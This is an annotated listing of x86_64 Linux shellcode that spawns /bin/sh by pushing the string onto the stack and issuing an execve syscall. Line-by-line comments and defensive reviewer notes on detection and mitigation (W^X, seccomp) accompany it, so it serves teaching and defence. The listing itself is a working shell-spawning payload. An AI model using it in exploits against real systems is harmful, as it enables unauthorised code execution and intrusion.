x86_64 Linux - Spawn a shell shellcode
; ----------------------------------------------------------------------
; execve("/bin/sh", NULL, NULL) via a raw Linux x86_64 syscall.
; Syntax: Intel operand order (dst, src), NASM-style ';' comments.
;
; Register roles at the `syscall` instruction:
;   rax = 0x3b  syscall number (execve in the x86_64 syscall table)
;   rdi = rsp   pathname: pointer to the NUL-terminated string on the stack
;   rsi = 0     argv = NULL
;   rdx = 0     envp = NULL
;
; Reviewer notes (defensive reading):
;   - No instruction follows `syscall` in this listing. If execve fails,
;     rax holds a negative errno and execution continues into whatever
;     bytes come next in memory.
;   - A NULL argv is atypical for ordinary program launches: execve(2)
;     documents it as accepted on Linux but non-portable, and newer kernels
;     (reportedly 5.18 and later - confirm for the target kernel) substitute
;     an empty argv[0] and log a one-time warning. An execve of /bin/sh
;     with no arguments and no environment is therefore a useful signal in
;     process-execution audit logs.
;   - Mitigations that apply to this pattern: non-executable stack/heap
;     (W^X) so injected bytes cannot run, and seccomp filters that deny
;     execve in processes that never need to start another program.
; ----------------------------------------------------------------------

; The 8-byte immediate is the ASCII string "/bin/sh" plus its NUL terminator.
; x86_64 is little-endian, so the least significant byte is stored first:
; in memory the bytes read 2f 62 69 6e 2f 73 68 00 = "/bin/sh\0".
mov rax, 0x0068732f6e69622f
; Store the string on the stack; rsp now points at its first byte.
push rax
; Select the syscall: 0x3b (59) is execve.
mov rax, 0x3b
; First argument: pointer to the path of the program to execute (the string just pushed).
mov rdi, rsp
; Second argument: argv pointer, set to NULL.
xor rsi, rsi
; Third argument: envp pointer, set to NULL (the new program starts with no environment variables).
xor rdx, rdx
; Enter the kernel; on success the calling process image is replaced by /bin/sh.
syscall
https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86_64-64_bit